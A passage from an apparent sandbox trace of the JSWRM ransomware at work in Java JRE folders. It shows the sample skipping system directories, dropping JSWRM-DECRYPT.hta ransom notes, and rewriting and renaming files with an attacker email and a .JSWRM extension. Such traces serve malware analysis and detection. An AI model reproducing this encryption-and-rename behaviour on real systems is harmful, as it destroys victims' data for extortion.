files\\java\\jre1.8.0_144\\lib\\accessibility.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0069.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0069.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0069.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.783] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe451d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="amd64", cAlternateFileName="")) returned 1 [0069.783] lstrcmpiW (lpString1="amd64", lpString2=".") returned 1 [0069.783] lstrcmpiW (lpString1="amd64", lpString2="..") returned 1 [0069.783] lstrcmpiW (lpString1="amd64", lpString2="...") returned 1 [0069.783] lstrcmpiW (lpString1="amd64", lpString2="windows") returned -1 [0069.783] lstrcmpiW (lpString1="amd64", lpString2="recovery") returned -1 [0069.783] lstrcmpiW (lpString1="amd64", lpString2="perflogs") returned -1 [0069.783] lstrcmpiW (lpString1="amd64", lpString2="documents and settings") returned -1 [0069.783] lstrcmpiW (lpString1="amd64", lpString2="$RECYCLE.BIN") returned 1 [0069.783] lstrcmpiW (lpString1="amd64", lpString2="system volume information") returned -1 [0069.783] lstrcmpiW (lpString1="amd64", lpString2="msocache") returned -1 [0069.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0069.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0069.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0069.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217b40 [0069.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.784] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jswrm-decrypt.hta")) returned 0xffffffff [0069.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0069.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0069.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0069.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0069.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0069.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0069.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.784] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.785] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.785] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0069.786] CloseHandle (hObject=0x454) returned 1 [0069.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0069.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0069.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0069.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0069.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0069.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0069.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2170f0 [0069.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.786] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jswrm-decrypt.hta")) returned 0x20 [0069.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2170f0 | out: hHeap=0x1e0000) returned 1 [0069.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0069.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0069.787] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe451d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x204245e1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232180 [0069.787] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.787] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe451d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x204245e1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.787] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.787] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.787] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x204245e1, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x204245e1, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x204245e1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0069.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0069.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0069.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0069.788] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="jvm.cfg", cAlternateFileName="")) returned 1 [0069.788] lstrcmpiW (lpString1="jvm.cfg", lpString2=".") returned 1 [0069.788] lstrcmpiW (lpString1="jvm.cfg", lpString2="..") returned 1 [0069.788] lstrcmpiW (lpString1="jvm.cfg", lpString2="...") returned 1 [0069.788] lstrcmpiW (lpString1="jvm.cfg", lpString2="windows") returned -1 [0069.788] lstrcmpiW (lpString1="jvm.cfg", lpString2="recovery") returned -1 [0069.788] lstrcmpiW (lpString1="jvm.cfg", lpString2="perflogs") returned -1 [0069.788] lstrcmpiW (lpString1="jvm.cfg", lpString2="documents and settings") returned 1 [0069.788] lstrcmpiW (lpString1="jvm.cfg", lpString2="$RECYCLE.BIN") returned 1 [0069.788] lstrcmpiW (lpString1="jvm.cfg", lpString2="system volume information") returned -1 [0069.788] lstrcmpiW (lpString1="jvm.cfg", lpString2="msocache") returned -1 [0069.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.cfg", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.cfg", cchWideChar=7, lpMultiByteStr=0x345ebd8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jvm.cfg", lpUsedDefaultChar=0x0) returned 7 [0069.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.cfg", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.cfg", cchWideChar=7, lpMultiByteStr=0x345eba8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jvm.cfg", lpUsedDefaultChar=0x0) returned 7 [0069.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0069.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0069.788] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.788] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=634) returned 1 [0069.788] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x270) returned 0x203550 [0069.788] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345e89c*=0x270, lpOverlapped=0x0) returned 1 [0069.789] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.789] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345e898*=0x270, lpOverlapped=0x0) returned 1 [0069.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0069.790] CloseHandle (hObject=0x458) returned 1 [0069.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0069.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0069.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0069.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0069.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0069.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f4d0 [0069.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.790] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0069.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0069.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0069.801] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="jvm.cfg", cAlternateFileName="")) returned 0 [0069.801] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0069.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0069.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0069.801] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="applet", cAlternateFileName="")) returned 1 [0069.801] lstrcmpiW (lpString1="applet", lpString2=".") returned 1 [0069.801] lstrcmpiW (lpString1="applet", lpString2="..") returned 1 [0069.801] lstrcmpiW (lpString1="applet", lpString2="...") returned 1 [0069.801] lstrcmpiW (lpString1="applet", lpString2="windows") returned -1 [0069.801] lstrcmpiW (lpString1="applet", lpString2="recovery") returned -1 [0069.801] lstrcmpiW (lpString1="applet", lpString2="perflogs") returned -1 [0069.801] lstrcmpiW (lpString1="applet", lpString2="documents and settings") returned -1 [0069.801] lstrcmpiW (lpString1="applet", lpString2="$RECYCLE.BIN") returned 1 [0069.801] lstrcmpiW (lpString1="applet", lpString2="system volume information") returned -1 [0069.801] lstrcmpiW (lpString1="applet", lpString2="msocache") returned -1 [0069.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0069.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0069.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0069.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0069.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217eb0 [0069.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0069.801] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\applet\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\applet\\jswrm-decrypt.hta")) returned 0xffffffff [0069.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217eb0 | out: hHeap=0x1e0000) returned 1 [0069.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0069.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0069.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0069.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0069.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217300 [0069.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.802] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\applet\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\applet\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.803] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.803] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0069.804] CloseHandle (hObject=0x454) returned 1 [0069.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217300 | out: hHeap=0x1e0000) returned 1 [0069.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0069.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0069.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0069.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0069.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0069.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217bf0 [0069.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.804] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\applet\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\applet\\jswrm-decrypt.hta")) returned 0x20 [0069.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217bf0 | out: hHeap=0x1e0000) returned 1 [0069.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0069.804] 